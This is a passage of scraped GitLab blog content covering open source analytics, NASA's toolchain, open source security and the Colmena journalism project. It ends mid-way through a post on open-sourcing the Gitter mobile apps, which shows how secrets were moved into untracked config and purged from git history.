company. We on the Data Team\nhave worked hard to embody the [values of GitLab](https://handbook.gitlab.com/handbook/values/),\nparticularly collaboration and transparency.\n\nIt starts by defaulting to public for everything. Our [primary code repository](https://gitlab.com/gitlab-data/analytics/)\nis public and MIT licensed, meaning anybody can contribute or just take what they find useful.\nOur code, issues, and [documentation](/handbook/business-technology/data-team/) are public.\n\n## This radical transparency has had several positive side effects\n\n### The effect I'm most excited about is having people contribute to our codebase.\n\nWhen we were migrating to Snowflake for our data warehouse, we needed to convert our SQL code\nthat was specific to PostgreSQL to a Snowflake-compatible format.\nOne of the models in our codebase [generates a table](https://dbt.gitlabdata.com/#!/model/model.gitlab_snowflake.date_details) of dates and related metadata such as day of year, week of year, quarter, etc.\nAn external contributor, [Matthias Wirtz](https://gitlab.com/swiffer), who had been following our\nproject and the [Meltano](https://meltano.com/) project, took it upon himself to make the\nupdate and create a merge request in our project. We went back and forth a bit with code review\nand testing, but eventually [it was merged](https://gitlab.com/gitlab-data/analytics/merge_requests/476/diffs) and we now rely on this code today!\n\n### Another great benefit is that it makes conversations easier within the analytics community.\n\nA key part of our data stack is data build tool, or [dbt](https://www.getdbt.com/) for short.\nThis is a powerful open source project that makes version controlling and executing SQL code easy.\nThe company behind the project, [Fishtown Analytics](https://www.fishtownanalytics.com/),\nhosts a great community on [Slack](https://slack.getdbt.com/). 
I've been able to answer basic\nquestions about project structure, documentation, and testing just by linking to our codebase and\n[dbt-generated docs](https://dbt.gitlabdata.com)\ncountless times, and the feedback is always positive. We see people who are shocked that\nwe're so open but also appreciative that they can poke around a production codebase with ease.\n\n### An additional benefit that we've seen is that by putting everything out in the open we're helping to drive the industry forward.\n\nIt's one thing to say \"Here's what we're doing, but sorry you can't see the code\" versus\n\"Here's what we're doing, here's _how_ we're doing it, and what are your ideas to make it better?\"\nThe latter invites people into the conversation to build upon ideas and others' creations.\n\n### The last piece I want to highlight is the idea that the actual code that you use for analytics isn't your company's competitive advantage.\n\nYou could know exactly how we move, store, model, and analyze our data, and its utility for a\ncompetitor would primarily be to get their own analytics off the ground.\nThe real value is the data itself and the decisions people make from the results of your analyses.\nWe, of course, protect our data and our customers' data, but there's no reason why people\nshouldn't be able to see how we _use_ that data to make decisions. And, being a transparent company,\nwe're very open about the decisions we make as well.\n\nOverall, we're seeing the same transformation that software engineering underwent with the [DevOps\nmovement](/topics/devops/) happen in the analytics world, only with about a five-year lag.\nMore open source tools are being created for data teams every day, and more people are sharing\nhow they build their stacks and analyze their data. 
At GitLab, we're betting that our [core values](https://handbook.gitlab.com/handbook/values/)\ncan bring emergent positive benefits to every part of a company, including data teams!\nWe look forward to collaborating with you as this industry changes and grows!\n",[267,803,9],{"slug":4238,"featured":6,"template":689},"open-source-analytics","content:en-us:blog:open-source-analytics.yml","Open Source Analytics","en-us/blog/open-source-analytics.yml","en-us/blog/open-source-analytics",{"_path":4244,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4245,"content":4251,"config":4257,"_id":4259,"_type":14,"title":4260,"_source":16,"_file":4261,"_stem":4262,"_extension":19},"/en-us/blog/open-source-nasa-gl",{"title":4246,"description":4247,"ogTitle":4246,"ogDescription":4247,"noIndex":6,"ogImage":4248,"ogUrl":4249,"ogSiteName":673,"ogType":674,"canonicalUrls":4249,"schema":4250},"MRI Technologies used GitLab for unified toolchains to NASA","Live from GitLab Commit: NASA will be flying Kubernetes clusters to the moon and GitLab is helping.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678434/Blog/Hero%20Images/nasagitlab.jpg","https://about.gitlab.com/blog/open-source-nasa-gl","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Commit: How MRI Technologies used GitLab to bring unified toolchains to NASA\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2019-09-17\",\n      }",{"title":4252,"description":4247,"authors":4253,"heroImage":4248,"date":3714,"body":4254,"category":10,"tags":4255},"GitLab Commit: How MRI Technologies used GitLab to bring unified toolchains to NASA",[1273],"\nNASA can put [Rovers on Mars](https://mars.nasa.gov/mer/), but a complex legacy software system proved a bit of a challenge. 
Speaking at GitLab Commit in Brooklyn, [Marshall Cottrell](https://www.linkedin.com/in/marshall-cottrell-27b385181) of [MRI Technologies](https://www.mricompany.com) explained how the company teamed up with NASA to launch the space agency into the era of modern application development using Kubernetes and GitLab.\n\nIn September 2018 MRI began work on a new software development platform called APPDAT. \"It's the only platform taking a totally 'fresh approach' to application development and data science activities within the Agency,\" Marshall said. The team's challenge was to update an Oracle-based legacy SCM solution using open source technologies and APIs. At the time NASA had no toolchains to support CI/CD during development and lots of silos of information. \"There was no mechanism for us to disseminate innovations, best practices, or what we learned,\" Marshall said. NASA needed a unified toolchain and platform for software delivery. \"GitLab was chosen as the platform source control management solution because it is the only product in this space that integrates all stages of the DevSecOps lifecycle.\"\n\n## A laser focus helps\n\nPerhaps not surprisingly MRI had ambitious goals for APPDAT, Marshall explained. The overarching hope was to build an automated DevOps platform that served as the single source of truth. Until MRI got involved, NASA had no way to actually \"own\" the software development process; teams operated in a piecemeal fashion, choosing contractors and solutions based on situational needs rather than looking at the big picture. 
Those decisions left NASA subject to potentially \"abusive behavior,\" Marshall explained.\n\nSo MRI laid out a number of goals:\n\n- Empower teams to fully manage the resources they support\n- Demonstrate and promote fully open project management and collaboration\n- Create a sandbox for protoyping with no barriers to entry\n- Assemble an API and data economy that would eliminate silos and promote reusability\n- Establish platform-level security controls with a goal of \"compliant by fault\"\n\nTo get there, MRI emphasized collaboration and tried to reach out to the \"forward-leaning\" customers and individual civil servant developers, engineers and researchers who were eager to contribute. The team adhered strictly to cloud native, Zero Trust and open source approaches and, in the end, came up with a Kubernetes platform that met the space agency's needs for today and in the future. The technology choices were important, but so was the time spent laying the groundwork for a culture change. \"Many modernization proposals try to meet everyone where they're at,\" Marshall explained. \"A more opinionated approach allows us to provide a succinct and unified toolchain that all parties can contribute to, evolve, and improve over time.\"\n\nToday the 61-year old space agency has a modern platform where developers can easily collaborate with non-developers, no complex tooling is required, and context switching is a thing of the past, Marshall said. APPDAT syncs from the agency's existing SCM solutions so everyone was able to continue to use the same tools.\n\nPerhaps most exciting, NASA's plans to have astronauts established on the moon by 2024 as part of the [Artemis program](https://www.nasa.gov/what-is-artemis). That will include a data center, and Marshall is confident Kubernetes will be part of the launch.\n\n\"We’ve already begun to change minds at NASA and you can do it at your enterprise too,\" Marshall said. 
His last best advice: Play the long game, only innovate when it makes things easier, and a bottom-up approach is an easy way to make friends.\n\nWatch Marshall's entire presentation here:\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/RsUw4Ueyn-c\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen>\u003C/iframe>\n\nDon't miss out on the chance to network with others on the same DevOps journey. Get your tickets to [Commit London on October 9](/events/commit/).\n\nCover image by [David Torres](https://unsplash.com/@djjabbua) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[4256,1038,910,9,1376],"GKE",{"slug":4258,"featured":6,"template":689},"open-source-nasa-gl","content:en-us:blog:open-source-nasa-gl.yml","Open Source Nasa Gl","en-us/blog/open-source-nasa-gl.yml","en-us/blog/open-source-nasa-gl",{"_path":4264,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4265,"content":4271,"config":4277,"_id":4279,"_type":14,"title":4280,"_source":16,"_file":4281,"_stem":4282,"_extension":19},"/en-us/blog/open-source-security",{"title":4266,"description":4267,"ogTitle":4266,"ogDescription":4267,"noIndex":6,"ogImage":4268,"ogUrl":4269,"ogSiteName":673,"ogType":674,"canonicalUrls":4269,"schema":4270},"How we manage open source security software","Open source software presents unique security challenges. 
Here’s what you need to know.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681227/Blog/Hero%20Images/opensourcesecurity.jpg","https://about.gitlab.com/blog/open-source-security","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we manage open source security software\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Loveless\"}],\n        \"datePublished\": \"2020-04-10\",\n      }",{"title":4266,"description":4267,"authors":4272,"heroImage":4268,"date":4274,"body":4275,"category":865,"tags":4276},[4273],"Mark Loveless","2020-04-10","\n\n_In February 2020, Harvard University and the Linux Foundation’s Core Infrastructure Initiative released a joint report, [Vulnerabilities in the Core](https://www.hbs.edu/news/releases/Pages/census-open-source-software-security.aspx), looking at security challenges in the open source software world. Open source software has [taken over the world](https://techcrunch.com/2019/01/12/how-open-source-software-took-over-the-world/), but with its astronomical popularity comes the potential for huge risk. We thought this was an excellent opportunity to ask senior security engineer [Mark Loveless](/company/team/#mloveless) for his thoughts on open source security, how GitLab approaches it, and some ways you can move the bar forward in your company._\n\nI was quite pleased that an institution like Harvard would be taking a hard look at open source software. Security is often difficult for people to understand how much it impacts real lives. Nerd types (the InfoSec community) try to communicate to the \"normals\" to explain to them why they need to care about security. Granted, this barely tracks on the radar of many people in our own field, as some of the Infosec community think they already know it.\n\n## Inside our security plan\n\nWe have dedicated people at GitLab looking at our own code, trying to find security flaws. 
We have a group that deals with bug submissions coming in from Hacker One. But we also have people at GitLab looking for security flaws in various open source packages that are a part of the \"supply chain\". These outside packages may be used in the GitLab product. When one of these packages has a flaw in it, there can be impact to both open source projects like ours, as well as closed source projects. It may be surprising to learn that a lot of closed source projects use open source libraries.\n\nUsing an open source library to complete a coding project is not uncommon and in fact highly encouraged. For example, reading through the Internet standards for protocol implementation of HTTPS could not only be daunting, but coding it without the experience of writing security-related code is ill-advised unless you are an expert in the field. Including a security-related open source library in your project can solve that issue. But speaking of something as complex as HTTPS, for example, brings up another problem - implementation.\n\n## The implementation issue\n\nA flaw is found in an open source package. Hundreds of applications are using the open source package with the vulnerability, yet only half of these applications are exploitable via the flaw. Why? A lot of times it comes down to implementation.\n\nWhen given a choice between one setting versus another, there are ramifications to consider when deciding which might make the most secure implementation. These choices have consequences. One choice could impact performance - especially at scale. Another choice could leave things more vulnerable. There are compliance issues to consider. All of these items need to be weighed carefully.\n\nIt’s a core thing at GitLab to be sure that we implement things in ways that are more secure. I’ve worked at numerous software vendors over the years and GitLab is one of the largest. 
Most organizations of this size do not release code nearly as often as we do, and most do not take security as seriously. When I started working here, I was pleasantly surprised at how much security was part of the process.\n\n## Trust the transparency\n\nWe’re not only a [transparent company](https://handbook.gitlab.com/handbook/values/#transparency), we’re an open core company. This means that the core part of our product is open source and free to download and use, while we have a number of paid options for increased features and services. This applies to everything in our company and is an added benefit when it comes to security. We’re very open about disclosing security problems. For example, when a bug affects our open source code any future code commit to fixing the problem also shows the vulnerability. At some of my other employers there were often discussions about the \"exposure\" of the company when revealing a vulnerability, and a pull between departments about how much to disclose. Sometimes those disclosure discussions turned political. At GitLab that problem is eliminated as we’ve made the commitment to completely disclose the issue. We’ve even extended this to the parts of our offerings that are not a part of that core product. It is in the best interest of our users to have complete information about the security of GitLab.\n\n## The role DevSecOps plays\n\nWhen it comes to writing code, bugs - security-related or not - are the nature of the beast. The trick is to expect it and plan for it. Here at GitLab we’re doing the DevSecOps thing: extraordinarily rapid development while retaining a [focus on security](/solutions/security-compliance/). There is a tendency here for our engineers to take the time and do things right. Bugs can impact performance and availability and security bugs are no different. This is why GitLab works so hard on delivering code that is as clean and secure as possible. When we manage to do that it’s a win/win. 
When bugs do occur, we have developed processes to deal with them which includes updates to our development processes if necessary to help improve the entire process.\n\n## Game on\n\nIf you’re trying to up your open source security game you already know it’s a constant work in progress. We encourage open source as much as possible! Open source or not, here are a few things that we’ve done at GitLab that apply to security:\n\n- You have to have security people involved in the company. Any security team needs to have people who have the capacity to analyze and handle flaws in code, whether the code is internal or external.\n- The security people need to be on staff. They need to have the freedom to do their jobs.\n- Upper management has to buy into security. If security is top of mind for upper management it will be easier to get things done at the department level.\n- **Lose the culture of shame and punishment for security problems.** It exists in lots of places and it’s why people start trying to hide bugs. 
There should not be a carrot and a stick involved in security.\n- Make security something that’s muscle memory and you’ll be golden.\n\n\nCover image by [Wolfgang Hasselmann](https://unsplash.com/@wolfgang_hasselmann) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[9,865,3091],{"slug":4278,"featured":6,"template":689},"open-source-security","content:en-us:blog:open-source-security.yml","Open Source Security","en-us/blog/open-source-security.yml","en-us/blog/open-source-security",{"_path":4284,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4285,"content":4291,"config":4296,"_id":4298,"_type":14,"title":4299,"_source":16,"_file":4300,"_stem":4301,"_extension":19},"/en-us/blog/open-source-tools-for-citizen-journalists",{"title":4286,"description":4287,"ogTitle":4286,"ogDescription":4287,"noIndex":6,"ogImage":4288,"ogUrl":4289,"ogSiteName":673,"ogType":674,"canonicalUrls":4289,"schema":4290},"How the Colmena project uses GitLab to support citizen journalists","Find out why the Colmena project, a GitLab Open Source Partner, relies on a DevSecOps platform to develop and deliver open source tools for citizen journalism.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683016/Blog/Hero%20Images/citizenjournalism.png","https://about.gitlab.com/blog/open-source-tools-for-citizen-journalists","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How the Colmena project uses GitLab to support citizen journalists\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-09-27\",\n      }",{"title":4286,"description":4287,"authors":4292,"heroImage":4288,"date":4293,"body":4294,"category":10,"tags":4295},[2909],"2023-09-27","\nIn an increasingly crowded media ecosystem, finding an audience — and being heard — can be difficult, especially for indigenous communities with limited access to global platforms. 
But using the open source [Colmena project](https://blog.colmena.media/), anyone can collaboratively plan, record, edit, and distribute hyperlocal and community-focused media products that reach audiences worldwide.\n\nThe Colmena project (which takes its name from the Spanish word for \"beehive\") is a [GitLab Open Source Partner](https://go.gitlab.com/030Ue3). I recently spoke with community members [Nils Brock](https://gitlab.com/nilsbrock), [Vivienne Gager](https://gitlab.com/vivienne.maria), and [Santiago Garcia Gago](https://gitlab.com/SantiagoGG) about how they use GitLab to help people find their voices, tell their stories, and help their communities.\n\nWe conducted our interview iteratively, asynchronously, and collaboratively [via merge request](https://gitlab.com/gitlab-com/marketing/developer-relations/open-source-program/gitlab-open-source-partners/publications-and-presentations/-/merge_requests/9).\n\n**Welcome to the the GitLab Open Source Partners community! We're so delighted you're here. Tell our readers more about Colmena. What is it?**\n\nBrock, Gager, and Garcia Gago: Colmena is open technology for journalists. Think of it as a mobile digital newsroom for field reporters and media outlets. Our software enables users to create and share content. But here is what's special: The solution is developed together with local and community media from the Global South, is free to use, and is completely open source. \n\nThe backbone of Colmena is a custom-made digital newsroom for production teams, which includes all essential features for content creation, with special consideration for audio productions and transmissions. So we have audio streaming and podcast production workflows, a mobile recording option (face-to-face and online interviews), and mobile text and audio editing tools. All tools are set up for cross-media collaboration and are highly customizable. 
It's also important to note that Colmena is already available in eight languages, including English, Arabic, and Ukranian.\n\nBut Colmena doesn't need to stop there. We are always open for new suggestions.\n\n**Where can users download Colmena? How can they use it?**\n\nAs a lightweight app (a so-called \"progressive web application,\" or PWA), Colmena performs on a wide range of mobile and desktop devices for easy online/offline creation and collaboration. On the server side, we have established a secure and federated architecture, offering cloud-based sharing, storage, and publishing wherever you want, be it your own website on social media or other platforms.\n\n**How did the project get started? What mission, vision, and values drive it?**\n\nThe initiative [was born as a response to the COVID-19 pandemic](https://p.dw.com/p/3ydGf), and it's led by DW Akademie and the Mexican NGO Redes por la Diversidad, Equidad y Sustentabilidad A.C. The project is supported by the German Federal Ministry of Economic development and Cooperation (BMZ) as part of the Global Crisis Initiative (GKI).\n\n[Our vision](https://p.dw.com/p/40B1S) is to provide safe and inclusive digital tools for the communication, creation, and sharing of human rights-based content, to defend and extend freedom of expression to all parts of the world. And as the driving force behind the Colmena project, our mission is to sustainably maintain and develop the open source Colmena software as a commons, based on the needs of community-centered communication, networking, and media practices of the global majority.\n\nCollaboration is an important aspect of Colmena's development model. We develop the application working closely with [media partners](https://p.dw.com/p/4B1ID), to whom we refer as \"communities of practice\" (CoPs). Generally, one or two members of each CoP serve as representatives of their media outlets in the Colmena project. One might say they have the most important role in the project. 
Colmena is a collective response to their needs, and we want to design it to overcome challenges they face.\n\n**How does the Colmena project use GitLab to accomplish all this?**\n\nWe use GitLab for the Colmena Project in three different ways. The first use is quite technical: We use it as [a development platform and code repository](https://git.colmena.network/maia). All repositories for the Colmena PWA are public; we keep only the \"infra\" project private (since that's where the data of our development servers are stored).\n\nSecondly, [GitLab's wiki feature](https://docs.gitlab.com/ee/user/project/wiki/) serves us quite well as a documentation space for both our general work team and additional collaborators, who are the coordinators of our CoPs and the media partners involved in the co-creation of Colmena. [In the wiki](https://git.colmena.network/maia/frontend/-/wikis/home), for instance, we socialize information for the onboarding of new team members — like general information on the project, additional literature, and manuals of the tools we use in the project and documentation of conducted workshops for internal knowledge sharing. Before, we had this documentation stored in a Nextcloud instance, but using GitLab for this work creates deeper understanding between the users, coordinators, and the development team about Colmena development processes and workflows.\n\nFinally, we maintain [an open \"support\" project](https://git.colmena.network/maia/support/-/issues?scope=all&state=all). In this project, the coordinators of the CoPs, who work with 30 media outlets from different countries, collect suggestions or detected bugs and report them. The development team evaluates and responds to each of them. If they need specialized attention — for example, development of a new feature or some bug fixing — we move these issues to the corresponding development projects. 
We are currently migrating this repository from our self-hosted instance [to GitLab.com](https://gitlab.com/colmena-project/communities-of-practice).\n\n**Why did the Colmena project choose GitLab as its development platform?**\n\nColmena was born as a free and open source software project; many of the developers and members of the coordination team have been involved in free software and community media projects before (for example, in the [Network of Community Radios and Free Software](https://liberaturadio.org/)). Our project always wanted to maintain this philosophy when looking for suitable software development platforms. That's why we chose GitLab: It shares our ideals regarding software development and knowledge sharing. Furthermore, Colmena is proud to use GitLab together with other free software projects that we have been using for ages, such as [Inkscape, Debian, and VLC](https://go.gitlab.com/030Ue3).\n\nBesides the shared philosophy, however, GitLab offers us technical options that other platforms do not. For example, it can be self-hosted, allows for management of groups and subgroups, and features integrated planning tools like [epics](https://docs.gitlab.com/ee/user/group/epics/) and [roadmaps](https://docs.gitlab.com/ee/user/group/roadmap/) that really benefit the development process.\n\n**How can potential contributors learn more about Colmena?**\n\nIf you want to get in touch with us, please visit [our website](https://colmena.media) or write the team directly at `info@colmena.media`. 
You can also [browse the project and contribute on GitLab](https://gitlab.com/colmena-project).\n\n## Watch the webcast \nWatch our interview with the Colmena project.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/4wIg2M1EoHI\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Learn more\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [GitLab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n",[9,267,1099],{"slug":4297,"featured":6,"template":689},"open-source-tools-for-citizen-journalists","content:en-us:blog:open-source-tools-for-citizen-journalists.yml","Open Source Tools For Citizen Journalists","en-us/blog/open-source-tools-for-citizen-journalists.yml","en-us/blog/open-source-tools-for-citizen-journalists",{"_path":4303,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4304,"content":4310,"config":4316,"_id":4318,"_type":14,"title":4319,"_source":16,"_file":4320,"_stem":4321,"_extension":19},"/en-us/blog/open-sourcing-the-gitter-mobile-apps",{"title":4305,"description":4306,"ogTitle":4305,"ogDescription":4306,"noIndex":6,"ogImage":4307,"ogUrl":4308,"ogSiteName":673,"ogType":674,"canonicalUrls":4308,"schema":4309},"Open-sourcing the Gitter mobile apps","Learn how we open sourced the Android and iOS Gitter apps.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666717/Blog/Hero%20Images/cover-image.jpg","https://about.gitlab.com/blog/open-sourcing-the-gitter-mobile-apps","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Open-sourcing the Gitter mobile apps\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Eric Eastwood\"}],\n        \"datePublished\": \"2019-11-22\",\n      
}",{"title":4305,"description":4306,"authors":4311,"heroImage":4307,"date":4313,"body":4314,"category":801,"tags":4315},[4312],"Eric Eastwood","2019-11-22","\nBefore we acquired Gitter, almost every part of Gitter was private/closed-source. The main [webapp](https://gitlab.com/gitlab-org/gitter/webapp) was open-sourced in June 2017 and got both mobile [Android](https://gitlab.com/gitlab-org/gitter/gitter-android-app)/[iOS](https://gitlab.com/gitlab-org/gitter/gitter-ios-app) apps open sourced in September 2018. If you would like to come help out, feel free to send us a merge request! This blog post will go over some of the technical details of making the projects available for anyone to contribute.\n\nHere is the basic overview:\n\n1.  Find secrets in the current state of the project (don't worry about the commit history) and move to some config that isn't tracked in the repo.\n1.  Find/remove secrets throughout the whole repo commit history.\n1.  Make the project public 🎉\n1.  Caveats:\n    - Because we are rewriting the git history, I don't know of a way to keep merge requests/pull requests because the MRs reference the old commit hashes.\n\nQuick navigation:\n\n- [Jump to open sourcing Android](#android)\n- [Jump to open sourcing iOS](#ios)\n\n## Android\n\nIf you want to check out the full project and final result, you can check out the [project on GitLab](https://gitlab.com/gitlab-org/gitter/gitter-android-app) ([open-sourced 2018-8-8](https://twitter.com/gitchat/status/1027293167471812611)).\n\nTo start out, we used the [GitHub to GitLab project import](https://docs.gitlab.com/ee/user/project/import/github.html) to move the private GitHub project over to GitLab. 
We named it `gitter-android-app2` so that later on we could create the actual clean public project without any of the orphaned git references that may potentially leak.\n\n### Finding secrets\n\n[`truffleHog`](https://github.com/dxa4481/truffleHog) will search for high entropy strings (like tokens/passwords) through the entire git repo history. It's also useful to find all the potential areas where secrets may still exist in the current state of the project. Some sticky points we encountered while using include:\n\n- \"I wish we could just search the current state of the project instead of all git history (the `--max_depth=2` argument will just make it search the diff of the latest commit)\" [dxa4481/truffleHog#92](https://github.com/dxa4481/truffleHog/issues/92).\n- \"The output will show the entire diff for the triggered commit which is a bit burdensome to see exactly what is wrong. The JSON output `--json` is sometimes easier to understand\" [https://github.com/dxa4481/truffleHog/issues/58](https://github.com/dxa4481/truffleHog/issues/58) or [dxa4481/truffleHog#102](https://github.com/dxa4481/truffleHog/issues/102).\n\n### Moving secrets to untracked config\n\nOnce we figure out where all of the secrets are we need a config/variable solution that isn't tracked by git but still lets them be available when building. We also wanted the solution to work in GitLab CI for some sanity builds/testing. 
There are lots of good articles on this topic:\n\n- [Remove private signing information from your project](https://developer.android.com/studio/build/gradle-tips#remove-private-signing-information-from-your-project)\n- [Keeping Your Android Project’s Secrets Secret](https://medium.com/@geocohn/keeping-your-android-projects-secrets-secret-393b8855765d)\n- [Hiding Secrets in Android Apps](https://rammic.github.io/2015/07/28/hiding-secrets-in-android-apps/)\n- [Keeping secrets in an Android Application](https://joshmcarthur.com/2014/02/16/keeping-secrets-in-an-android-application.html)\n- [Android: Loading API Keys and other secrets from properties file using gradle](https://gist.github.com/curioustechizen/9f7d745f9f5f51355bd6)\n- [How can I keep API keys out of source control?](https://arstechnica.com/information-technology/2013/12/how-can-i-keep-api-keys-out-of-source-control/)\n\nOur solution is completely based on the information in these articles. We chose to go the route of defining things in a `secrets.properties` file which can easily be read in the Gradle build script which handles the build even when using Android Studio. 
If the `secrets.properties` file doesn't exist (like in CI), it will try to read the secrets from [environment variables which can easily be supplied in the project settings](https://docs.gitlab.com/ee/ci/variables/).\n\n`secrets.properties`\n\n```properties\n# Visit https://developer.gitter.im/apps (sign in) and create a new app\n# Name: my-gitter-android-app (can be anything)\n# Redirect URL: https://gitter.im/login/oauth/callback\noauth_client_id=\"...\"\noauth_client_secret=\"...\"\noauth_redirect_uri=\"https://gitter.im/login/oauth/callback\"\n```\n\n`build.gradle`\n\n```gradle\napply plugin: 'com.android.application'\n\n// Try reading secrets from file\ndef secretsPropertiesFile = rootProject.file(\"secrets.properties\")\ndef secretProperties = new Properties()\nif (secretsPropertiesFile.exists()) {\n    secretProperties.load(new FileInputStream(secretsPropertiesFile))\n}\n// Otherwise read from environment variables, this happens in CI\nelse {\n    secretProperties.setProperty(\"oauth_client_id\", \"\\\"${System.getenv('oauth_client_id')}\\\"\")\n    secretProperties.setProperty(\"oauth_client_secret\", \"\\\"${System.getenv('oauth_client_secret')}\\\"\")\n    secretProperties.setProperty(\"oauth_redirect_uri\", \"\\\"${System.getenv('oauth_redirect_uri')}\\\"\")\n}\n\nandroid {\n    ...\n\n    defaultConfig {\n        ...\n\n        buildConfigField(\"String\", \"oauth_client_id\", \"${secretProperties['oauth_client_id']}\")\n        buildConfigField(\"String\", \"oauth_client_secret\", \"${secretProperties['oauth_client_secret']}\")\n        buildConfigField(\"String\", \"oauth_redirect_uri\", \"${secretProperties['oauth_redirect_uri']}\")\n    }\n    ...\n}\n```\n\nUse the config variables in the Java app:\n\n```java\nimport im.gitter.gitter.BuildConfig;\n\nBuildConfig.oauth_client_id;\nBuildConfig.oauth_client_secret;\nBuildConfig.oauth_redirect_uri;\n```\n\n#### Removing compiled assets\n\nWe use a `WebView` to display the HTML markdown messages in the 
chat room. This view uses assets built from the main [`webapp` project](https://gitlab.com/gitlab-org/gitter/webapp). Because these assets had some inlined production [`webapp`](https://gitlab.com/gitlab-org/gitter/webapp) secrets that whole directory needed to be removed.\n\nInitially, we opted to have the developer build these assets with their own secrets and symlink the build output directory. The [community made this even simpler](https://gitlab.com/gitlab-org/gitter/gitter-android-app/merge_requests/113), so now there is just a Gradle task to run which fetches the latest build we have available from the `webapp` GitLab CI.\n\n### Removing secrets from the repo history\n\nFrom your `truffleHog` results earlier, you should know where secrets were stored throughout the history. We can use [BFG Repo-Cleaner](https://rtyley.github.io/bfg-repo-cleaner/) to remove and rewrite the repo history quickly.\n\nWhen using BFG, I wanted just to rewrite all of the sensitive values in `app/src/main/res/values/settings.xml` instead of completely removing them, but rewriting isn't an option with BFG so I went ahead with deleting it and recreated it in a commit afterwards. 🤷\n\nFor the Android app, here are the BFG commands I used,\n\n- Remove `app/src/main/assets/www/`\n  - `java -jar \"bfg.jar\" --delete-folders www`\n- Remove `app/src/main/res/values/settings.xml`\n  - `java -jar \"bfg.jar\" --delete-files settings.xml`\n- Remove sensitive strings where we can't just remove the whole file (collected from `truffleHog` results)\n  - `java -jar \"bfg.jar\" --replace-text \"gitter-android-bad-words.txt\"`\n\nAfter you think you removed all the secrets, it's best to run `truffleHog` again just to make sure no secrets are leftover. 😉\n\n### Make it public\n\nNow it's time to update your `readme` with some setup instruction so the community knows how to contribute.\n\nThis is the scary part 😅. 
Go to **Project settings** > **General** > **Permissions** > set **Project visibility** as **Public**. You can [read more about project access here](https://docs.gitlab.com/ee/public_access/public_access.html).\n\nCurious about how to setup builds in GitLab CI? [Learn more from this blog post](/blog/setting-up-gitlab-ci-for-android-projects/), which was what we used to set it up for our projects.\n\nYou can even learn how we [automated the release process so we can publish straight to the Google Play Store from GitLab CI via fastlane 🚀](/blog/android-publishing-with-gitlab-and-fastlane/).\n\n## iOS\n\nIf you want to see the full project and final result, you can check out the [project on GitLab](https://gitlab.com/gitlab-org/gitter/gitter-ios-app) ([open-sourced 2018-9-18](https://twitter.com/gitchat/status/1041795909103898625)).\n\nThe same concepts apply from the Android section. We create a separate private project, `gitter-ios-app2`, where we can work and later on, we can create the actual clean public project(`gitter-ios-app`) without any of the orphaned git references that could leak.\n\n### Finding secrets\n\n`truffleHog` didn't work well in the iOS project because there was a bunch of generated XCode files that had file hashes (high entropy strings which truffleHog looks for) – which meant every commit was listed. 🤦‍ Instead of trying to find something to filter the results down or get another tool, I decided just search manually. Here is the list of things we looked for:\n\n- `token`\n- `secret`\n- `key`\n- `cert`\n- `api`\n- `pw`\n- `password`\n\nI used this directory filter when `Ctrl + f` those strings above to avoid finding things outside of the repo itself (copy-paste for Atom editor): `!Common/,!Libraries,!Gitter/www,!Pods/,!xctool`\n\n### Moving secrets to untracked config\n\nThe iOS app uses a few git sub-modules which we also had to check for secrets before making them public. 
It turned out only one of the sub-modules – [`troupeobjccommon`](https://gitlab.com/gitlab-org/gitter/troupeobjccommon) – had secrets of its own, so I ran through the same secret removal process.\n\nWe had the same OAuth secrets in the main part of the iOS app, but since `troupeobjccommon` was also trying to handle OAuth secret settings, we opted for putting the new logic in `troupeobjccommon` to avoid having to refactor whatever other downstream code that uses the same submodule (like the macOS desktop app).\n\nHere are some articles around handling secrets in an iOS project,\n\n- [Secret variables in Xcode AND your CI for fun and profit 💌](https://medium.com/flawless-app-stories/secret-variables-in-xcode-and-your-ci-for-fun-and-profit-d387a50475d7)\n- [Secrets Management in iOS Applications](https://medium.com/@jules2689/secrets-management-in-ios-applications-52795c254ec1)\n\nSince iOS apps can only be built on macOS and we don't have any macOS GitLab CI runners, our solution doesn't have to be CI compatible. 
